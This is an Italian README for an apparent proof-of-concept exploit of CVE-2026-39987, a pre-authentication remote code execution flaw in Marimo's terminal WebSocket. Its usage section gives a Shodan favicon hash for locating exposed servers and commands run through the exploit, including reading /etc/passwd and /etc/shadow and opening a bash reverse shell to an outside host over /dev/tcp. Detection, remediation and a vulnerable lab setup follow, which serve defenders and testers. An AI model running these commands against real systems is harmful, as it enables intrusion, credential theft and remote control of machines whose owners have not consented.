
PoC di CVE-2026-39987: RCE pre-autenticazione via WebSocket in Marimo precedente alla 0.23.0 (CVSS 9.3).
Questo script è SOLO a scopo educativo e per test autorizzati. L'uso non autorizzato di questo strumento contro sistemi senza permesso esplicito è ILLEGALE. L'autore non è responsabile dell'uso improprio di queste informazioni.
Le versioni di Marimo precedenti alla 0.23.0 presentano una vulnerabilità critica di esecuzione remota di comandi (RCE) senza autenticazione preventiva. L'endpoint /terminal/ws non implementa controlli di accesso adeguati, consentendo a un attaccante non autenticato di ottenere una shell interattiva completa sul sistema.
| Dettaglio | Informazione |
|---|---|
| CVE | CVE-2026-39987 |
| Gravità | CRITICA |
| Punteggio CVSS | 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H) |
| Tipo | Pre-Auth Remote Code Execution (RCE) |
| Vettore | WebSocket (/terminal/ws) |
| Prodotto Affetto | Marimo < 0.23.0 |
| Patch | Marimo ≥ 0.23.0 |
http.favicon.hash:-1864630356
text
-1864630356/api/versionpip install websockets requests
Uso Base
bash
python CVE-2026-39987_PoC.py http://vittima.com:8080 "id"
Esempi
bash
# Ottenere informazioni sul sistema
python CVE-2026-39987_PoC.py http://target.com:8080 "id"
python CVE-2026-39987_PoC.py http://target.com:8080 "uname -a"
python CVE-2026-39987_PoC.py http://target.com:8080 "whoami"
# Leggere file sensibili
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/passwd"
python CVE-2026-39987_PoC.py http://target.com:8080 "cat /etc/shadow"
# Reverse shell
python CVE-2026-39987_PoC.py http://target.com:8080 "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
# Shell interattiva
python CVE-2026-39987_PoC.py http://target.com:8080 "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
🛡️ Rilevamento (Sicuro)
Script di rilevamento passivo
bash
python detector.py -u http://target.com:8080
python detector.py -l urls.txt
Modello Nuclei
yaml
# marimo-cve-2026-39987.yaml
id: CVE-2026-39987
info:
name: Marimo < 0.23.0 Pre-Auth RCE
severity: critical
# ... (modello completo incluso)
🔧 Rimedio
Immediato
SCOLLEGARE il sistema dalla rete se è esposto
Bloccare l'accesso alla porta su cui gira Marimo
Controllare i log per attività sospette
Permanente
bash
# Aggiornare alla versione patchata
pip install --upgrade marimo>=0.23.0
# Verificare la versione
marimo --version
# Configurare l'autenticazione se esposto pubblicamente
# NON esporre MAI 'marimo edit' direttamente su internet
Docker (Ambiente vulnerabile)
bash
# Eseguire la versione vulnerabile per i test
docker run -p 8080:8080 marimo-team/marimo:0.22.0
# Verificare la vulnerabilità
python CVE-2026-39987_detector.py http://localhost:8080
# Sfruttare
python CVE-2026-39987_PoC.py http://localhost:8080 "id"
GitHub Security Advisory
NVD Entry
Pull Request #9098
Documentazione Marimo
👥 Crediti
Scoperta: [Nome del ricercatore]
Sviluppo PoC: [Il tuo nome]
Patch: Marimo Team
📜 Licenza
Questo progetto è solo a scopo educativo. L'uso di questo software è a tuo rischio.
⭐ Se questo README ti è stato utile, considera di dare una stella al repository.
⚠️ RICORDA: CON GRANDI POTERI DERIVANO GRANDI RESPONSABILITÀ